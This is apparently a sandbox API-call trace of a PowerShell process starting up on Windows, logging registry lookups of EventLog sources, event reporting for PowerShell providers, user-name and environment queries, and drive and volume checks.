	[0301.522] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.522] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x388) returned 0x0
	[0301.522] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.522] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x38c) returned 0x0
	[0301.522] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.522] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x390) returned 0x0
	[0301.522] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.523] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x394) returned 0x0
	[0301.523] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.523] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x398) returned 0x0
	[0301.523] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x39c) returned 0x0
	[0301.523] RegCloseKey (hKey=0x39c) returned 0x0
	[0301.523] RegCloseKey (hKey=0x378) returned 0x0
	[0301.523] RegCloseKey (hKey=0x398) returned 0x0
	[0301.524] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d078 | out: phkResult=0x12d078*=0x398) returned 0x0
	[0301.524] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12cfec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12cfe8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12cfec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12cfe8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.524] CoTaskMemFree (pv=0x0) 
	[0301.524] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.524] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.524] CoTaskMemFree (pv=0x35b1e0) 
	[0301.525] CoTaskMemFree (pv=0x0) 
	[0301.525] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.525] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.525] CoTaskMemFree (pv=0x35b1e0) 
	[0301.525] CoTaskMemFree (pv=0x0) 
	[0301.525] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.525] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.525] CoTaskMemFree (pv=0x35b1e0) 
	[0301.525] CoTaskMemFree (pv=0x0) 
	[0301.525] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.525] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.525] CoTaskMemFree (pv=0x35b1e0) 
	[0301.525] CoTaskMemFree (pv=0x0) 
	[0301.525] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.525] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.525] CoTaskMemFree (pv=0x35b1e0) 
	[0301.525] CoTaskMemFree (pv=0x0) 
	[0301.525] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.525] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.525] CoTaskMemFree (pv=0x35b1e0) 
	[0301.525] CoTaskMemFree (pv=0x0) 
	[0301.525] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.525] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.525] CoTaskMemFree (pv=0x35b1e0) 
	[0301.526] CoTaskMemFree (pv=0x0) 
	[0301.526] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.526] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.526] CoTaskMemFree (pv=0x35b1e0) 
	[0301.526] CoTaskMemFree (pv=0x0) 
	[0301.526] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.526] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x35b1e0, lpcchName=0x12d078, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d078, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.526] CoTaskMemFree (pv=0x35b1e0) 
	[0301.526] CoTaskMemFree (pv=0x0) 
	[0301.526] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x378) returned 0x0
	[0301.526] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x0) returned 0x2
	[0301.526] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x39c) returned 0x0
	[0301.526] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x0) returned 0x2
	[0301.526] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x3a0) returned 0x0
	[0301.526] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x0) returned 0x2
	[0301.527] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x3a4) returned 0x0
	[0301.527] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x0) returned 0x2
	[0301.527] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x3a8) returned 0x0
	[0301.527] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x0) returned 0x2
	[0301.527] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x3ac) returned 0x0
	[0301.527] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x0) returned 0x2
	[0301.527] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x3b0) returned 0x0
	[0301.527] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x0) returned 0x2
	[0301.527] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x3b4) returned 0x0
	[0302.317] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x0) returned 0x2
	[0302.317] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x394) returned 0x0
	[0302.318] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0d8 | out: phkResult=0x12d0d8*=0x3b0) returned 0x0
	[0302.318] RegCloseKey (hKey=0x3b0) returned 0x0
	[0302.318] RegCloseKey (hKey=0x398) returned 0x0
	[0302.318] RegCloseKey (hKey=0x394) returned 0x0
	[0302.321] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b960008
	[0302.862] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d59918*="WSMan", lpRawData=0x2d59688) returned 1
	[0302.879] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0302.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.880] CoTaskMemFree (pv=0x3a6ee0) 
	[0302.880] CoTaskMemAlloc (cb=0x804) returned 0x1b7b9720
	[0302.880] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7b9720, nSize=0x12d368 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d368) returned 0x1
	[0302.881] CoTaskMemFree (pv=0x1b7b9720) 
	[0302.881] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0302.881] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d3a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3a8) returned 1
	[0302.881] CoTaskMemFree (pv=0x35b1e0) 
	[0302.881] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d5f2f8*="Alias", lpRawData=0x2d5f088) returned 1
	[0302.885] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0302.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.885] CoTaskMemFree (pv=0x3a6ee0) 
	[0302.885] CoTaskMemAlloc (cb=0x804) returned 0x1b7b9720
	[0302.885] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7b9720, nSize=0x12d368 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d368) returned 0x1
	[0302.886] CoTaskMemFree (pv=0x1b7b9720) 
	[0302.886] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0302.886] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d3a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3a8) returned 1
	[0302.886] CoTaskMemFree (pv=0x35b1e0) 
	[0302.886] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d648f0*="Environment", lpRawData=0x2d64680) returned 1
	[0302.890] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0302.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.890] CoTaskMemFree (pv=0x3a6ee0) 
	[0302.890] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0302.891] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0302.891] CoTaskMemFree (pv=0x3a6ee0) 
	[0302.891] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0302.891] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0302.891] CoTaskMemFree (pv=0x3a6ee0) 
	[0302.891] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0302.891] SetErrorMode (uMode=0x1) returned 0x1
	[0302.891] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d120 | out: lpFileInformation=0x12d120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.891] SetErrorMode (uMode=0x1) returned 0x1
	[0302.892] GetLogicalDrives () returned 0x4
	[0302.892] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.893] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0302.893] SetErrorMode (uMode=0x1) returned 0x1
	[0302.893] CoTaskMemAlloc (cb=0x68) returned 0x3cf8b0
	[0302.893] CoTaskMemAlloc (cb=0x68) returned 0x3cf4c0
	[0302.893] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3cf8b0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d0f0, lpMaximumComponentLength=0x12d0ec, lpFileSystemFlags=0x12d0e8, lpFileSystemNameBuffer=0x3cf4c0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d0f0*=0x9c354b42, lpMaximumComponentLength=0x12d0ec*=0xff, lpFileSystemFlags=0x12d0e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0302.893] CoTaskMemFree (pv=0x3cf8b0) 
	[0302.894] CoTaskMemFree (pv=0x3cf4c0) 
	[0302.894] SetErrorMode (uMode=0x1) returned 0x1
	[0302.894] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0302.894] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.894] SetErrorMode (uMode=0x1) returned 0x1
	[0302.894] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.894] SetErrorMode (uMode=0x1) returned 0x1
	[0302.894] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.894] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.895] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0302.895] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cc10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.895] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0302.895] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.895] SetErrorMode (uMode=0x1) returned 0x1
	[0302.895] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cec0 | out: lpFileInformation=0x12cec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.895] SetErrorMode (uMode=0x1) returned 0x1
	[0302.896] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.896] SetErrorMode (uMode=0x1) returned 0x1
	[0302.896] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cec0 | out: lpFileInformation=0x12cec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.896] SetErrorMode (uMode=0x1) returned 0x1
	[0302.896] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.896] SetErrorMode (uMode=0x1) returned 0x1
	[0302.896] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cf60 | out: lpFileInformation=0x12cf60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.896] SetErrorMode (uMode=0x1) returned 0x1
	[0302.896] CoTaskMemAlloc (cb=0x804) returned 0x1b7b9720
	[0302.896] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7b9720, nSize=0x12d368 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d368) returned 0x1
	[0302.897] CoTaskMemFree (pv=0x1b7b9720) 
	[0302.897] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0302.897] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d3a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3a8) returned 1
	[0302.897] CoTaskMemFree (pv=0x35b1e0) 
	[0302.897] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d6b9e0*="FileSystem", lpRawData=0x2d6b770) returned 1
	[0302.911] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0302.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.911] CoTaskMemFree (pv=0x3a6ee0) 
	[0302.911] CoTaskMemAlloc (cb=0x804) returned 0x1b7b9720
	[0302.911] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7b9720, nSize=0x12d368 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d368) returned 0x1
	[0302.912] CoTaskMemFree (pv=0x1b7b9720) 
	[0302.912] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0302.912] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d3a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3a8) returned 1
	[0302.912] CoTaskMemFree (pv=0x35b1e0) 
	[0302.912] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d71220*="Function", lpRawData=0x2d70fb0) returned 1
	[0302.916] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0302.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.916] CoTaskMemFree (pv=0x3a6ee0) 
	[0304.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.923] CoTaskMemAlloc (cb=0x804) returned 0x1b7b9720
	[0304.923] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7b9720, nSize=0x12d368 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d368) returned 0x1
	[0304.924] CoTaskMemFree (pv=0x1b7b9720) 
	[0304.924] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0304.924] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d3a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3a8) returned 1
	[0304.924] CoTaskMemFree (pv=0x35b1e0) 
	[0304.924] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da35f8*="Registry", lpRawData=0x2da3388) returned 1
	[0305.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.952] CoTaskMemAlloc (cb=0x804) returned 0x1b7b9720
	[0305.952] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7b9720, nSize=0x12d368 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d368) returned 0x1
	[0305.952] CoTaskMemFree (pv=0x1b7b9720) 
	[0305.952] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0305.952] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d3a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3a8) returned 1
	[0305.953] CoTaskMemFree (pv=0x35b1e0) 
	[0305.953] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da8a10*="Variable", lpRawData=0x2da87a0) returned 1
	[0305.998] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0305.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
